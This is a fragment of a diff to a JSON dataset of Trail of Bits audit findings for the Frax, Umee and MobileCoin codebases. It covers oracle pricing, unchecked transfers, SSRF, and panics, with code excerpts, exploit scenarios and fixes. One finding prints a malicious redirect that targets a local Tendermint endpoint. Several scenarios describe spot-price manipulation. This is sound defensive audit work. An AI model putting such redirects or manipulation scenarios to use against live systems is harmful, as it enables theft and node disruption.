1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } Figure 19.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L217 Exploit Scenario The value of LP positions does not reect a sharp decline in the market value of the underlying tokens. Rather than incentivizing recollateralization, the protocol continues to mint FRAX tokens and causes the true collateralization ratio to fall even further. Although the protocol appears to be solvent, due to incorrect valuations, it is not. Recommendations Short term, discontinue the use of LP tokens as collateral since the valuations are inaccurate and misrepresent the amount of collateral backing FRAX. Long term, use oracles to derive the fair value of LP tokens. For Uniswap V2, this means using the constant product to compute the value of the underlying tokens independent of the spot price. For Uniswap V3, this means using oracles to determine the current composition of the underlying tokens that the NFT represents. References Christophe Michel, \"Pricing LP tokens | Warp Finance hack\" Alpha Finance, \"Fair Uniswap's LP Token Pricing\"", + "title": "9. Oracle rewards may not be distributed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "If the x/oracle module lacks the coins to cover a reward payout, the rewards will not be distributed or registered for payment in the future. var periodRewards sdk.DecCoins for _, denom := range rewardDenoms { rewardPool := k.GetRewardPool(ctx, denom) // return if there's no rewards to give out if rewardPool.IsZero() { continue } periodRewards = periodRewards.Add(sdk.NewDecCoinFromDec( denom, sdk.NewDecFromInt(rewardPool.Amount).Mul(distributionRatio), )) } Figure 9.1: A loop in the code that calculates oracle rewards ( umee/x/oracle/keeper/reward.go#4356 ) Recommendations Short term, document the fact that oracle rewards will not be distributed when the x/oracle module does not have enough coins to cover the rewards.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2552,29 +5310,29 @@ ] }, { - "title": "20. Missing check of return value of transfer and transferFrom ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Some tokens, such as BAT, do not precisely follow the ERC20 specication and will return false or fail silently instead of reverting. Because the codebase does not consistently use OpenZeppelins SafeERC20 library, the return values of calls to transfer and transferFrom should be checked. However, return value checks are missing from these calls in many areas of the code, opening the TWAMM contract (the time-weighted automated market maker) to severe vulnerabilities. function provideLiquidity(uint256 lpTokenAmount) external { require (totalSupply() != 0 , 'EC3' ); //execute virtual orders longTermOrders.executeVirtualOrdersUntilCurrentBlock(reserveMap); //the ratio between the number of underlying tokens and the number of lp tokens must remain invariant after mint uint256 amountAIn = lpTokenAmount * reserveMap[tokenA] / totalSupply(); uint256 amountBIn = lpTokenAmount * reserveMap[tokenB] / totalSupply(); ERC20(tokenA).transferFrom( msg.sender , address( this ), amountAIn); ERC20(tokenB).transferFrom( msg.sender , address( this ), amountBIn); [...] Figure 20.1: contracts/FPI/TWAMM.sol#L125-136 Exploit Scenario Frax deploys the TWAMM contract. Pools are created with tokens that do not revert on failure, allowing an attacker to call provideLiquidity and mint LP tokens for free; the attacker does not have to deposit funds since the transferFrom call fails silently or returns false . Recommendations Short term, x the instance described above. Then, x all instances detected by slither . --detect unchecked-transfer . Long term, review the Token Integration Checklist in appendix D and integrate Slither into the projects CI pipeline to prevent regression and catch new instances proactively.", + "title": "10. Risk of server-side request forgery attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The price-feeder sends HTTP requests to congured providers APIs. If any of the HTTP responses is a redirect response (e.g., one with HTTP response code 301), the module will automatically issue a new request to the address provided in the responses header. The new address may point to a local address, potentially one that provides access to restricted services. Exploit Scenario An attacker gains control over the Osmosis API. He changes the endpoint used by the price-feeder such that it responds with a redirect like that shown in gure 10.1, with the goal of removing a transaction from a Tendermint validators mempool. The price-feeder automatically issues a new request to the Tendermint REST API. Because the API does not require authentication and is running on the same machine as the price-feeder , the request is successful, and the target transaction is removed from the validator's mempool. HTTP/1.1 301 Moved Permanently Location: http://localhost:26657/remove_tx?txKey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Figure 10.1: The redirect response Recommendations Short term, use a function such as CheckRedirect to disable redirects, or at least redirects to local services, in all HTTP clients.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "21. A rewards distributor does not exist for each reward token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The FraxUnifiedFarmTemplate contracts setGaugeController function (gure 21.1) has the onlyTknMgrs modier. All other functions with the onlyTknMgrs modier set a value in an array keyed only to the calling token managers token index. Except for setGaugeController , which sets the global rewards_distributor state variable, all other functions that set global state variables have the onlyByOwnGov modier. This modier is stricter than onlyTknMgrs , in that it cannot be called by token managers. As a result, any token manager can set the rewards distributor that will be used by all tokens. This exposes the underlying issue: there should be a rewards distributor for each token instead of a single global distributor, and a token manager should be able to set the rewards distributor only for her token. function setGaugeController ( address reward_token_address , address _rewards_distributor_address , address _gauge_controller_address ) external onlyTknMgrs(reward_token_address) { gaugeControllers[rewardTokenAddrToIdx[reward_token_address]] = _gauge_controller_address; rewards_distributor = IFraxGaugeFXSRewardsDistributor(_rewards_distributor_address); } Figure 21.1: The setGaugeController function ( FraxUnifiedFarmTemplate.sol#639642 ) Exploit Scenario Reward manager A calls setGaugeController to set his rewards distributor. Then, reward manager B calls setGaugeController to set his rewards distributor, overwriting the rewards distributor that A set. Later, sync is called, which in turn calls retroCatchUp . As a result, distributeRewards is called on Bs rewards distributor; however, distributeRewards is not called on As rewards distributor. Recommendations Short term, replace the global rewards distributor with an array that is indexed by token index to store rewards distributors, and ensure that the system calls distributeRewards on all reward distributors within the retroCatchUp function. Long term, ensure that token managers cannot overwrite each others settings.", + "title": "11. Incorrect comparison in SetCollateralSetting method ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Umee users can send a SetCollateral message to disable the use of a certain asset as collateral. The messages are handled by the SetCollateralSetting method (gure 11.1), which should ensure that the borrow limit will not drop below the amount borrowed. However, the function uses an incorrect comparison, checking that the borrow limit will be greater than, not less than, that amount. // Return error if borrow limit would drop below borrowed value if newBorrowLimit.GT(borrowedValue) { return sdkerrors.Wrap(types.ErrBorrowLimitLow, newBorrowLimit.String()) } Figure 11.1: The incorrect comparison in the SetCollateralSetting method ( umee/x/leverage/keeper/keeper.go#343346 ) Exploit Scenario An attacker provides collateral to the Umee system and borrows some coins. Then the attacker disables the use of the collateral asset; because of the incorrect comparison in the SetCollateralSetting method, the disable operation succeeds, and the collateral is sent back to the attacker. Recommendations Short term, correct the comparison in the SetCollateralSetting method. Long term, implement tests to check whether basic functionality works as expected.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Low" ] }, { - "title": "22. minVeFXSForMaxBoost can be manipulated to increase rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "minVeFXSForMaxBoost is calculated based on the current spot price when a user stakes Uniswap V2 LP tokens. If an attacker manipulates the spot price of the pool prior to staking LP tokens, the reward boost will be skewed upward, thereby increasing the amount of rewards earned. The attacker will earn outsized rewards relative to the amount of liquidity provided. function fraxPerLPToken () public view returns ( uint256 ) { // Get the amount of FRAX 'inside' of the lp tokens uint256 frax_per_lp_token ; // Uniswap V2 // ============================================ { [...] uint256 total_frax_reserves ; ( uint256 reserve0 , uint256 reserve1 , ) = (stakingToken.getReserves()); Figure 22.1: contracts/Staking/FraxCrossChainFarmSushi.sol#L242-L250 function userStakedFrax ( address account ) public view returns ( uint256 ) { return (fraxPerLPToken()).mul(_locked_liquidity[account]).div(1e18); } function minVeFXSForMaxBoost ( address account ) public view returns ( uint256 ) { return (userStakedFrax(account)).mul(vefxs_per_frax_for_max_boost).div(MULTIPLIER_PRECISION ); } function veFXSMultiplier ( address account ) public view returns ( uint256 ) { if ( address (veFXS) != address ( 0 )){ // The claimer gets a boost depending on amount of veFXS they have relative to the amount of FRAX 'inside' // of their locked LP tokens uint256 veFXS_needed_for_max_boost = minVeFXSForMaxBoost(account); [...] Figure 22.2: contracts/Staking/FraxCrossChainFarmSushi.sol#L260-L272 Exploit Scenario An attacker sells a large amount of FRAX through the incentivized Uniswap V2 pool, increasing the amount of FRAX in the reserve. In the same transaction, the attacker calls stakeLocked and deposits LP tokens. The attacker's reward boost, new_vefxs_multiplier , increases due to the large trade, giving the attacker outsized rewards. The attacker then swaps his tokens back through the pool to prevent losses. Recommendations Short term, do not use the Uniswap spot price to calculate reward boosts. Long term, use canonical and audited rewards contracts for Uniswap V2 liquidity mining, such as MasterChef.", + "title": "12. Voters ability to overwrite their own pre-votes is not documented ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The x/oracle module allows voters to submit more than one pre-vote message during the same pre-voting period, overwriting their previous pre-vote messages (gure 12.1). This feature is not documented; while it does not constitute a direct security risk, it may be unintended behavior. Third parties may incorrectly assume that validators cannot change their pre-vote messages. Monitoring systems may detect only the rst pre-vote event for a validators pre-vote messages, while voters may trust the exchange rates and salts revealed by other voters to be nal. On the other hand, this feature may be an intentional one meant to allow voters to update the exchange rates they submit as they obtain more accurate pricing information. func (ms msgServer) AggregateExchangeRatePrevote( goCtx context.Context, msg *types.MsgAggregateExchangeRatePrevote, ) (*types.MsgAggregateExchangeRatePrevoteResponse, error ) { // (...) aggregatePrevote := types.NewAggregateExchangeRatePrevote(voteHash, valAddr, uint64 (ctx.BlockHeight())) // This call overwrites previous pre-vote if there was one ms.SetAggregateExchangeRatePrevote(ctx, valAddr, aggregatePrevote) ctx.EventManager().EmitEvents(sdk.Events{ // (...) - emit EventTypeAggregatePrevote and EventTypeMessage }) return &types.MsgAggregateExchangeRatePrevoteResponse{}, nil } Figure 12.1: umee/x/oracle/keeper/msg_server.go#L23-L66 Recommendations Short term, document the fact that a pre-vote message can be submitted and overwritten in the same voting period. Alternatively, disallow this behavior by having the AggregateExchangeRatePrevote function return an error if a validator attempts to submit an additional exchange rate pre-vote message. Long term, add tests to check for this behavior.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2582,59 +5340,49 @@ ] }, { - "title": "23. Most collateral is not directly redeemable by depositors ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The following describes the on-chain situation on December 20, 2021. The Frax stablecoin has a total supply of 1.5 billion FRAX. Anyone can mint new FRAX tokens by calling FraxPoolV3.mintFrax and paying the necessary amount of collateral and FXS. Conversely, anyone can redeem his or her FRAX for collateral and FXS by calling FraxPoolV3.redeemFrax . However, the Frax team manually moves collateral from the FraxPoolV3 contract into AMO contracts in which the collateral is used to generate yield. As a result, only $5 million (0.43%) of the collateral backing FRAX remains in the FraxPoolV3 contract and is available for redemption. If those $5 million are redeemed, the Frax Finance team would have to manually move collateral from the AMOs to FraxPoolV3 to make further redemptions possible. Currently, $746 million (64%) of the collateral backing FRAX is managed by the ConvexAMO contract. FRAX owners cannot access the ConvexAMO contract, as all of its operations can be executed only by the Frax team. Exploit Scenario Owners of FRAX want to use the FraxPoolV3 contracts redeemFrax function to redeem more than $5 million worth of FRAX for the corresponding amount of collateral. The redemption fails, as only $5 million worth of USDC is in the FraxPoolV3 contract. From the redeemers' perspectives, FRAX is no longer exchangeable into something worth $1, removing the base for its stable price. Recommendations Short term, deposit more FRAX into the FraxPoolV3 contract so that the protocol can support a larger volume of redemptions without requiring manual intervention by the Frax team. Long term, implement a mechanism whereby the pools can retrieve FRAX that is locked in AMOs to pay out redemptions.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "24. FRAX.globalCollateralValue counts FRAX as collateral ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Each unit of FRAX represents $1 multiplied by the collateralization ratio of debt. That is, if the collateralization ratio is 86%, the Frax Protocol owes each holder of FRAX $0.86. Instead of accounting for this as a liability, the protocol includes this debt as an asset backing FRAX. In other words, FRAX is backed in part by FRAX. Because the FRAX.globalCollateralValue includes FRAX as an asset and not debt, the true collateralization ratio is lower than stated, and users cannot redeem FRAX for the underlying collateral in mass for reasons beyond those described in TOB-FRSOL-023 . This issue occurs extensively throughout the code. For instance, the amount FRAX in a Uniswap V3 liquidity position is included in the contracts collateral value. function TotalLiquidityFrax () public view returns ( uint256 ) { uint256 frax_tally = 0 ; Position memory thisPosition; for ( uint256 i = 0 ; i < positions_array.length; i++) { thisPosition = positions_array[i]; uint128 this_liq = thisPosition.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickLower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisPosition.tickUpper); if (thisPosition.collateral_address > 0x853d955aCEf822Db058eb8505911ED77F175b99e ){ // if address(FRAX) < collateral_address, then FRAX is token0 frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, this_liq)); } } } Figure 24.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L199-L216 In another instance, the value of FRAX in FRAX/token liquidity positions on Arbitrum is counted as collateral. Again, FRAX should be counted as debt and not collateral. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 1 ] = reserve0; else if (token0 == arbi_collateral_address) reserve_pack[ 2 ] = reserve0; // Test token1 if (token1 == canonical_frax_address) reserve_pack[ 0 ] = reserve1; else if (token1 == canonical_fxs_address) reserve_pack[ 1 ] = reserve1; else if (token1 == arbi_collateral_address) reserve_pack[ 2 ] = reserve1; } // Get the token rates return_info[ 0 ] = (reserve_pack[ 0 ] * 1e18) / (the_pair.totalSupply()); return_info[ 1 ] = (reserve_pack[ 1 ] * 1e18) / (the_pair.totalSupply()); return_info[ 2 ] = (reserve_pack[ 2 ] * 1e18) / (the_pair.totalSupply()); // Set the pair type (used later) if (return_info[ 0 ] > 0 && return_info[ 1 ] == 0 ) return_info[ 3 ] = 0 ; // FRAX/XYZ else if (return_info[ 0 ] == 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 1 ; // FXS/XYZ else if (return_info[ 0 ] > 0 && return_info[ 1 ] > 0 ) return_info[ 3 ] = 2 ; // FRAX/FXS else revert( \"Invalid pair\" ); } Figure 24.2: contracts/Misc_AMOs/__CROSSCHAIN/Arbitrum/SushiSwapLiquidityAMO_ARBI.sol #L196-L229 Exploit Scenario Users attempt to redeem FRAX for USDC, but the collateral backing FRAX is, in part, FRAX itself, and not enough collateral is available for redemption. The collateralization ratio does not accurately reect when the protocol is insolvent. That is, it indicates that FRAX is fully collateralized in the scenario in which 100% of FRAX is backed by FRAX. Recommendations Short term, revise FRAX.globalCollateralValue so that it does not count FRAX as collateral, and ensure that the protocol deposits the necessary amount of collateral to ensure the collateralization ratio is reached. Long term, after xing this issue, continue reviewing how the protocol accounts for collateral and ensure the design is sound.", + "title": "13. Lack of user-controlled limits for input amount in LiquidateBorrow ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The x/leverage modules LiquidateBorrow function computes the amount of funds that will be transferred from the module to the functions caller in a liquidation. The computation uses asset prices retrieved from an oracle. There is no guarantee that the amount returned by the module will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to LiquidateBorrow . Adding a lower limit to the amount sent by the module would enable the caller to explicitly state his or her assumptions about the liquidation and to ensure that the collateral payout is as protable as expected. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the diculty level of this nding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls the LiquidateBorrow function. Due to an oracle malfunction, the amount of collateral transferred from the module is much lower than the amount she would receive on another market. Recommendations Short term, introduce a minRewardAmount parameter and add a check verifying that the reward value is greater than or equal to the minRewardAmount value. Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. Enable the caller to add a lower limit for a transfer from a module and an upper limit for a transfer of the callers funds to a module.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e188 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insucient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the eect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization. 18. calc_withdraw_one_coin is vulnerable to manipulation Severity: High Diculty: High Type: Data Validation Finding ID: TOB-FRSOL-018 Target: MIM_Convex_AMO.sol", + "title": "14. Lack of simulation and fuzzing of leverage module invariants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee system lacks comprehensive Cosmos SDK simulations and invariants for its x/oracle and x/leverage modules. More thorough use of the simulation feature would facilitate fuzz testing of the entire blockchain and help ensure that the invariants hold. Additionally, the current simulation module may need to be modied for the following reasons: It exits on the rst transaction error . To avoid an early exit, it could skip transactions that are expected to fail when they are generated; however, that could also cause it to skip logic that contains issues. The numKeys argument , which determines how many accounts it will use, can range from 2 to 2,500. Using too many accounts may hinder the detection of bugs that require multiple transactions to be executed by a few accounts. By default, it is congured to use a \"stake\" currency , which may not be used in the nal Umee system. Running it with a small number of accounts and a large block size for many blocks could quickly cause all validators to be unbonded. To avoid this issue, the simulation would need the ability to run for a longer time. attempted to use the simulation module by modifying the recent changes to the Umee codebase, which introduce simulations for the x/oracle and x/leverage modules (commit f22b2c7f8e ). We enabled the x/leverage module simulation and modied the Cosmos SDK codebase locally so that the framework would use fewer accounts and log errors via Fatalf logs instead of exiting. The framework helped us nd the issue described in TOB-UMEE-15 , but the setup and tests we implemented were not exhaustive. We sent the codebase changes we made to the Umee team via an internal chat. Recommendations Short term, identify, document, and test all invariants that are important for the systems security, and identify and document the arbitrage opportunities created by the system. Enable simulation of the x/oracle and x/leverage modules and ensure that the following assertions and invariants are checked during simulation runs: 1. In the UpdateExchangeRates function , the token supply value corresponds to the uToken supply value. Implement the following check: if uTokenSupply != 0 { assert(tokenSupply != 0) } 2. In the LiquidateBorrow function (after the line if !repayment.Amount.IsPositive() ) , the following comparisons evaluate to true: ExchangeUToken(reward) == EquivalentTokenValue(repayment, baseRewardDenom) TokenValue(ExchangeUToken(ctx, reward)) == TokenValue(repayment) borrowed.AmountOf(repayment.Denom) >= repayment.Amount collateral.AmountOf(rewardDenom) >= reward.Amount module's collateral amount >= reward.Amount repayment <= desiredRepayment 3. The x/leverage module is never signicantly undercollateralized at the end of a transaction. Implement a check, total collateral value * X >= total borrows value , in which X is close to 1. (It may make sense for the value of X to be greater than or equal to 1 to account for module reserves.) It may be acceptable for the module to be slightly undercollateralized, as it may mean that some liquidations have yet to be executed. 4. The amount of reserves remains above a certain minimum value, or new loans cannot be issued if the amount of reserves drops below a certain value. 5. The interest on a loan is less than or equal to the borrowing fee. (This invariant is related to the issue described in TOB-UMEE-23 .) 6. 7. 8. It is impossible to borrow funds without paying a fee. Currently, when four messages (lend, borrow, repay, and withdraw messages) are sent in one transaction, the EndBlocker method will not collect borrowing fees. Token/uToken exchange rates are always greater than or equal to 1 and are less than an expected maximum. To avoid rapid signicant price increases and decreases, ensure that the rates do not change more quickly than expected. The exchangeRate value cannot be changed by public (user-callable) methods like LendAsset and WithdrawAsset . Pay special attention to rounding errors and make sure that the module is the beneciary of all rounding operations. 9. It is impossible to liquidate more than the closeFactor in a single liquidation transaction for a defaulted loan; be mindful of the fact that a single transaction can include more than one message. Long term, e xtend the simulation module to cover all operations that may occur in a real Umee deployment, along with all potential error states, and run it many times before each release. Ensure the following: All modules and operations are included in the simulation module. The simulation uses a small number of accounts (e.g., between 5 and 20) to increase the likelihood of an interesting state change. The simulation uses the currencies/tokens that will be used in the production network. Oracle price changes are properly simulated. (In addition to a mode in which prices are changed randomly, implement a mode in which prices are changed only slightly, a mode in which prices are highly volatile, and a mode in which prices decrease or increase continuously for a long time period.) The simulation continues running when a transaction triggers an error. All transaction code paths are executed. (Enable code coverage to see how often individual lines are executed.)", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "25. Setting collateral values manually is error-prone ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "During the audit, the Frax Solidity team indicated that collateral located on non-mainnet chains is included in FRAX.globalCollateralValue in FRAXStablecoin , the Ethereum mainnet contract . (As indicated in TOB-FRSOL-023 , this collateral cannot currently be redeemed by users.) Using a script, the team aggregates collateral prices from across multiple chains and contracts and then posts that data to ManualTokenTrackerAMO by calling setDollarBalances . Since we did not have the opportunity to review the script and these contracts were out of scope, we cannot speak to the security of this area of the system. Other issues with collateral accounting and pricing indicate that this process needs review. Furthermore, considering the following issues, this privileged role and architecture signicantly increases the attack surface of the protocol and the likelihood of a hazard: The correctness of the script used to calculate the data has not been reviewed, and users cannot audit or verify this data for themselves. The conguration of the Frax Protocol is highly complex, and we are not aware of how these interactions are tracked. It is possible that collateral can be mistakenly counted more than once or not at all. The reliability of the script and the frequency with which it is run is unknown. In times of market volatility, it is not clear whether the script will function as anticipated and be able to post updates to the mainnet. This role is not explained in the documentation or contracts, and it is not clear what guarantees users have regarding the collateralization of FRAX (i.e., what is included and updated). As of December 20, 2021, collatDollarBalance has not been updated since November 13, 2021 , and is equivalent to fraxDollarBalanceStored . This indicates that FRAX.globalCollateralValue is both out of date and incorrectly counts FRAX as collateral (see TOB-FRSOL-024 ). Recommendations Short term, include only collateral that can be valued natively on the Ethereum mainnet and do not include collateral that cannot be redeemed in FRAX.globalCollateralValue . Long term, document and follow rigorous processes that limit risk and provide condence to users. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "15. Attempts to overdraw collateral cause WithdrawAsset to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The WithdrawAsset function panics when an account attempts to withdraw more collateral than the account holds. While panics triggered during transaction runs are recovered by the Cosmos SDK , they should be used only to handle unexpected events that should not occur in normal blockchain operations. The function should instead check the collateralToWithdraw value and return an error if it is too large. The panic occurs in the Dec.Sub method when the calculation it performs results in an overow (gure 15.1). func (k Keeper) WithdrawAsset( /* (...) */ ) error { // (...) if amountFromCollateral.IsPositive() { if k.GetCollateralSetting(ctx, lenderAddr, uToken.Denom) { // (...) // Calculate what borrow limit will be AFTER this withdrawal collateral := k.GetBorrowerCollateral(ctx, lenderAddr) collateralToWithdraw := sdk.NewCoins(sdk.NewCoin(uToken.Denom, amountFromCollateral)) newBorrowLimit, err := k.CalculateBorrowLimit(ctx, collateral.Sub(collateralToWithdraw) ) Figure 15.1: umee/x/leverage/keeper/keeper.go#L124-L159 To reproduce this issue, use the test shown in gure 15.2. Exploit Scenario A user of the Umee system who has enabled the collateral setting lends 1,000 UMEE tokens. The user later tries to withdraw 1,001 UMEE tokens. Due to the lack of validation of the collateralToWithdraw value, the transaction causes a panic. However, the panic is recovered, and the transaction nishes with a panic error . Because the system does not provide a proper error message, the user is confused about why the transaction failed. Recommendations Short term, when a user attempts to withdraw collateral, have the WithdrawAsset function check whether the collateralToWithdraw value is less than or equal to the collateral balance of the users account and return an error if it is not. This will prevent the function from panicking if the withdrawal amount is too large. Long term, integrate the test shown in gure 15.2 into the codebase and extend it with additional assertions to verify other program states. func (s *IntegrationTestSuite) TestWithdrawAsset_InsufficientCollateral() { app, ctx := s.app, s.ctx lenderAddr := sdk.AccAddress([] byte ( \"addr________________\" )) lenderAcc := app.AccountKeeper.NewAccountWithAddress(ctx, lenderAddr) app.AccountKeeper.SetAccount(ctx, lenderAcc) // mint and send coins s.Require().NoError(app.BankKeeper.MintCoins(ctx, minttypes.ModuleName, initCoins)) s.Require().NoError(app.BankKeeper.SendCoinsFromModuleToAccount(ctx, minttypes.ModuleName, lenderAddr, initCoins)) // mint additional coins for just the leverage module; this way it will have available reserve // to meet conditions in the withdrawal logic s.Require().NoError(app.BankKeeper.MintCoins(ctx, types.ModuleName, initCoins)) // set collateral setting for the account uTokenDenom := types.UTokenFromTokenDenom(umeeapp.BondDenom) err := s.app.LeverageKeeper.SetCollateralSetting(ctx, lenderAddr, uTokenDenom, true ) s.Require().NoError(err) // lend asset err = s.app.LeverageKeeper.LendAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 1000000000 )) // 1k umee s.Require().NoError(err) // verify collateral amount and total supply of minted uTokens collateral := s.app.LeverageKeeper.GetCollateralAmount(ctx, lenderAddr, uTokenDenom) expected := sdk.NewInt64Coin(uTokenDenom, 1000000000 ) // 1k u/umee s.Require().Equal(collateral, expected) supply := s.app.LeverageKeeper.TotalUTokenSupply(ctx, uTokenDenom) s.Require().Equal(expected, supply) // withdraw more collateral than having - this panics currently uToken := collateral.Add(sdk.NewInt64Coin(uTokenDenom, 1 )) err = s.app.LeverageKeeper.WithdrawAsset(ctx, lenderAddr, uToken) s.Require().EqualError(err, \"TODO/FIXME: set proper error string here after fixing panic error\" ) // TODO/FIXME: add asserts to verify all other program state } Figure 15.2: A test that can be used to reproduce this issue", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "1. Project contains vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Running cargo-audit over the codebase revealed that the system under audit uses crates with Rust Security (RustSec) advisories and crates that are no longer maintained. RustSec ID", + "title": "16. Division by zero causes the LiquidateBorrow function to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Two operations in the x/leverage modules LiquidateBorrow method may involve division by zero and lead to a panic. The rst operation is shown in gure 16.1. If both repayValue and maxRepayValue are zero, the GTE (greater-than-or-equal-to) comparison will succeed, and the Quo method will panic. The repayValue variable will be set to zero if liquidatorBalance is set to zero; maxRepayValue will be set to zero if either closeFactor or borrowValue is set to zero. if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue) .Quo(repayValue) .TruncateInt() repayValue = maxRepayValue } Figure 16.1: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#452456 ) The second operation is shown in gure 16.2. If both reward.Amount and collateral.AmountOf(rewardDenom) are set to zero, the GTE comparison will succeed, and the Quo method will panic. The collateral.AmountOf(rewardDenom) variable can easily be set to zero, as the user may not have any collateral in the denomination indicated by the variable; reward.Amount will be set to zero if liquidatorBalance is set to zero. // reward amount cannot exceed available collateral if reward.Amount.GTE(collateral.AmountOf(rewardDenom)) { // reduce repayment.Amount to the maximum value permitted by the available collateral reward repayment.Amount = repayment.Amount.Mul(collateral.AmountOf(rewardDenom)) .Quo(reward.Amount) // use all collateral of reward denom reward.Amount = collateral.AmountOf(rewardDenom) } Figure 16.2: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#474480 ) Exploit Scenario A user tries to liquidate a loan. For reasons that are unclear to the user, the transaction fails with a panic. Because the error message is not specic, the user has diculty debugging the error. Recommendations Short term, replace the GTE comparison with a strict inequality GT (greater-than) comparison. Long term, carefully validate variables in the LiquidateBorrow method to ensure that every variable stays within the expected range during the 